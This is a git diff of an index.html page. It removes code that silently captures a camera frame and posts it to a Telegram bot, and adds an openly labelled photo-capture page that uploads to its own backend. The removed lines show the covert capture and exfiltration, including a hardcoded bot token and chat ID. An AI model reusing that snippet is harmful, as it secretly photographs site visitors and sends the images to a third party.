--- a/index.html
+++ b/index.html
@@ -3,78 +3,49 @@
 <head>
     <meta charset="UTF-8">
     <meta name="viewport" content="width=device-width, initial-scale=1.0">
-    <title>Black Background Example</title>
-    <style>
-        body {
-            background-color: black;
-            color: white;
-            display: flex;
-            justify-content: center;
-            align-items: center;
-            height: 100vh;
-            margin: 0;
-            font-family: Arial, sans-serif;
-        }
-        h1 {
-            text-align: center;
-            font-size: 3em;
-            text-shadow: 2px 2px 10px rgba(255, 255, 255, 0.5);
-        }
-    </style>
+    <title>Capture Photo</title>
 </head>
 <body>
-    <h1>Welcome to My Black Background Page</h1>
-
-    <!-- Button to request camera permission and take a photo -->
-    <button id="take-photo-btn">Take a Photo</button>
-
-    <!-- Video element to display the camera feed -->
-    <video id="video" width="640" height="480"></video>
-
-    <!-- Canvas element to capture the photo -->
-    <canvas id="canvas" width="640" height="480"></canvas>
-
+    <h1>Capture a Photo</h1>
+    <video id="video" width="640" height="480" autoplay></video>
+    <button id="snap">Take Photo</button>
+    <canvas id="canvas" width="640" height="480" style="display: none;"></canvas>
     <script>
-        // Get the video and canvas elements
         const video = document.getElementById('video');
         const canvas = document.getElementById('canvas');
-        const ctx = canvas.getContext('2d');
+        const context = canvas.getContext('2d');
+        const snap = document.getElementById('snap');
 
-        // Get the button element
-        const takePhotoBtn = document.getElementById('take-photo-btn');
+        // Access the camera
+        navigator.mediaDevices.getUserMedia({ video: true })
+            .then(stream => {
+                video.srcObject = stream;
+                video.play();
+            })
+            .catch(err => {
+                console.error("Error accessing the camera: ", err);
+            });
 
-        // Request camera permission and take a photo
-        takePhotoBtn.addEventListener('click', () => {
-            // Request camera permission
-            navigator.mediaDevices.getUserMedia({ video: true })
-                .then(stream => {
-                    // Set the video source to the camera feed
-                    video.srcObject = stream;
-                    video.play();
-
-                    // Take a photo when the video is playing
-                    video.addEventListener('playing', () => {
-                        // Draw the video frame on the canvas
-                        ctx.drawImage(video, 0, 0, canvas.width, canvas.height);
-
-                        // Get the photo as a blob
-                        canvas.toBlob(blob => {
-                            // Create a form data object to send the photo to Telegram
-                            const formData = new FormData();
-                            formData.append('photo', blob);
-
-                            // Send the photo to Telegram using the Telegram API
-                            fetch(`https://api.telegram.org/bot6197747448:AAFrgXeZdjQZ1iTm9AE6v56h6y-qShiH5es/sendPhoto?chat_id=5112680061`, {
-                                method: 'POST',
-                                body: formData
-                            })
-                            .then(response => response.json())
-                            .then(data => console.log(data))
-                            .catch(error => console.error(error));
-                        });
-                    });
-                })
-                .catch(error => console.error(error));
+        // Capture photo
+        snap.addEventListener('click', () => {
+            context.drawImage(video, 0, 0, 640, 480);
+            const dataURL = canvas.toDataURL('image/png');
+            
+            // Send the photo to the backend server
+            fetch('/api/upload', {
+                method: 'POST',
+                headers: {
+                    'Content-Type': 'application/json',
+                },
+                body: JSON.stringify({ image: dataURL }),
+            })
+            .then(response => response.json())
+            .then(data => {
+                console.log('Success:', data);
+            })
+            .catch((error) => {
+                console.error('Error:', error);
+            });
         });
     </script>
 </body>
